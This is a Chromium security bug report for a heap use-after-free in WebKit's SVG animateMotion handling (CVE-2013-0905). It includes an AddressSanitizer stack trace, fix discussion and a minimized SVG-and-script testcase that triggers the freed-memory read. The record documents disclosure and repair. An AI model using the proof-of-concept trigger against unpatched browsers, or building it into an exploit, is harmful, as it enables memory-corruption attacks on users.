New issue
Advanced search Search tips

Issue 168982 link

Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Feb 2013
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security



Sign in to add a comment

Heap-use-after-free in WebCore::SVGAnimateMotionElement::updateAnimationPath

Reported by attek...@gmail.com, Jan 9 2013

Issue description


Repro-file as attachment.

Tested on:

OS: Ubuntu 12.04
Chromium: 26.0.1377.0 (Developer Build 175484)

ASAN-report:

==9976== ERROR: AddressSanitizer: heap-use-after-free on address 0x7fa6645f105c at pc 0x7fa69858da82 bp 0x7fffdda0c370 sp 0x7fffdda0c368
READ of size 4 at 0x7fa6645f105c thread T0 (chrome)
    #0 0x7fa69858da81 in WebCore::SVGAnimateMotionElement::updateAnimationPath() ???:0
    #1 0x7fa6985817a6 in WebCore::SVGMPathElement::removedFrom(WebCore::ContainerNode*) ???:0
    #2 0x7fa6986091be in WebCore::ChildNodeRemovalNotifier::notifyDescendantRemovedFromDocument(WebCore::ContainerNode*) ???:0
    #3 0x7fa6986091e9 in WebCore::ChildNodeRemovalNotifier::notifyDescendantRemovedFromDocument(WebCore::ContainerNode*) ???:0
    #4 0x7fa6986091e9 in WebCore::ChildNodeRemovalNotifier::notifyDescendantRemovedFromDocument(WebCore::ContainerNode*) ???:0
    #5 0x7fa698605602 in void WebCore::Private::addChildNodesToDeletionQueue<WebCore::Node, WebCore::ContainerNode>(WebCore::Node*&, WebCore::Node*&, WebCore::ContainerNode*) ???:0
.
.
.
freed by thread T0 (chrome) here:
    #0 0x7fa693df7682 in operator delete(void*) ??:0
    #1 0x7fa698431c0b in WebCore::SVGSMILElement::disconnectConditions() ???:0
    #2 0x7fa69843c4c6 in WebCore::SVGSMILElement::setTargetElement(WebCore::SVGElement*) ???:0
    #3 0x7fa69859b404 in WebCore::SVGAnimationElement::setTargetElement(WebCore::SVGElement*) ???:0
    #4 0x7fa69843229c in WebCore::SVGSMILElement::buildPendingResource() ???:0
    #5 0x7fa69843b245 in WebCore::SVGSMILElement::svgAttributeChanged(WebCore::QualifiedName const&) ???:0
.
.
.

 
chrome-heap-use-after-free-WebCoreSVGAnimateMotionElementupdateAnimationPath-5c29.svg
1.8 KB View Download
Cc: schenney@chromium.org fmalita@chromium.org pdr@chromium.org
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecSeverity-High OS-All Stability-AddressSanitizer
Status: Available
ClusterFuzz report coming in https://cluster-fuzz.appspot.com/testcase?key=158915162
Summary: Heap-use-after-free in WebCore::SVGAnimateMotionElement::updateAnimationPath (was: Heap-use-after-free in WebCore::SVGAnimateMotionElement::updateAnimationPath)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=158915162

Uploader: aarya@google.com

Crash Type: Heap-use-after-free READ 4
Crash Address: 0x7f5747325c9c
Crash State:
  - crash stack -
  WebCore::SVGAnimateMotionElement::updateAnimationPath
  WebCore::SVGMPathElement::removedFrom
  - free stack -
  WebCore::SVGSMILElement::disconnectConditions
  WebCore::SVGSMILElement::setTargetElement
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=172728:172836

Minimized Testcase (0.70 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv95NR0-Ybh1K2u3VJupsMqqARZ79CiyVIdvg5P5sw2CNhzQLmASfHJM0CSkhFFK57PsSUNiQ4GwqI-mzT19QltWHZZGKNqPpAsMgu5K5ZwsypXfsAosP7b3VOtTiq9VYCHe8_fN0jutZWDaZv5J0BON02vz-jeo_1u6zrsyoT7trmgITjBM
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">


<path id="curve">

<ellipse >
	<animateMotion id="One">
	</animateMotion>
<animateMotion begin="One.begin+1" id="M">
		<mpath xlink:href="#curve"/>
	</animateMotion>
</ellipse>
<g id="go">
<script><![CDATA[
 svgNS = test0=document.getElementById("go")
 test3=document.getElementById("M")
 test5=document.getElementById("One")
 test14=document.getElementById("curve")

setTimeout(function(){
try{test0.appendChild(test14.cloneNode(true))}catch(e){};
try{test3.appendChild(test0.cloneNode(true))}catch(e){};
},0)

try{test3.replaceChild(test5,test3.firstChild)}catch(e){}
setTimeout(function(){location.reload()},30)
]]></script>
Cc: -pdr@chromium.org
Labels: Mstone-24 SecImpacts-Stable SecImpacts-Beta
Owner: pdr@chromium.org
Status: Assigned
definitely looks like regression from https://trac.webkit.org/changeset/137509/. Philip, can you please help to take a look. it should affect m24, since we will be or might have already merged 137509 (Security fix).

Comment 4 by pdr@chromium.org, Jan 9 2013

This is me, looking into it now.

Comment 5 by pdr@chromium.org, Jan 10 2013

Having trouble reproing on the mac but I'm pretty sure I see what's wrong. Should have a patch up tomorrow when I get in the office.

Comment 6 by pdr@chromium.org, Jan 10 2013

Status: Started
Filed upstream with a minimized repro: https://bugs.webkit.org/show_bug.cgi?id=106530
friendly ping :)

Comment 8 by pdr@chromium.org, Jan 18 2013

pong.

This one is turning out to be a difficult one and I'm still working on it.
Thanks Philip!
Hey Philip,

I'm following up on all the open high-severity security bugs since Pwnium/Pwn2Own (http://blog.chromium.org/2013/01/show-off-your-security-skills-pwn2own.html) is just around the corner (we're using M25).

How's this one going?

Comment 11 by pdr@chromium.org, Feb 13 2013

Speculative patch up in webkitland.
Labels: -Mstone-24 Mstone-25
moving m24 bugs to m25.
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: Fixed
http://trac.webkit.org/changeset/142899
Project Member

Comment 14 by ClusterFuzz, Feb 16 2013

ClusterFuzz has detected this issue as fixed in range 182694:182726.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=158915162

Uploader: aarya@google.com

Crash Type: Heap-use-after-free READ 4
Crash Address: 0x7f5747325c9c
Crash State:
  - crash stack -
  WebCore::SVGAnimateMotionElement::updateAnimationPath
  WebCore::SVGMPathElement::removedFrom
  - free stack -
  WebCore::SVGSMILElement::disconnectConditions
  WebCore::SVGSMILElement::setTargetElement
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=172728:172836
Fixed: https://cluster-fuzz.appspot.com/revisions?range=182694:182726

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv95NR0-Ybh1K2u3VJupsMqqARZ79CiyVIdvg5P5sw2CNhzQLmASfHJM0CSkhFFK57PsSUNiQ4GwqI-mzT19QltWHZZGKNqPpAsMgu5K5ZwsypXfsAosP7b3VOtTiq9VYCHe8_fN0jutZWDaZv5J0BON02vz-jeo_1u6zrsyoT7trmgITjBM

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Labels: -Merge-Approved Merge-Merged Release-1
M25: http://trac.webkit.org/changeset/143491
Labels: CVE-2013-0905
Project Member

Comment 18 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Type-Security -Area-WebKit -SecSeverity-High -Stability-AddressSanitizer -SecImpacts-Stable -SecImpacts-Beta -Mstone-25 Cr-Content Security-Impact-Beta Security-Severity-High Security-Impact-Stable M-25 Type-Bug-Security Performance-Memory-AddressSanitizer
Project Member

Comment 19 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High
Project Member

Comment 20 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member

Comment 21 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member

Comment 22 by bugdroid1@chromium.org, Apr 1 2013

Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member

Comment 23 by bugdroid1@chromium.org, Apr 5 2013

Labels: -Cr-Content Cr-Blink
Labels: -Restrict-View-SecurityNotify
Bulk release of old security bug reports.

Labels: reward-na
Labels: -reward-na reward-ineligible
Project Member

Comment 27 by sheriffbot@chromium.org, Jun 14 2016

Labels: -security_impact-beta
Project Member

Comment 28 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 29 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted

Sign in to add a comment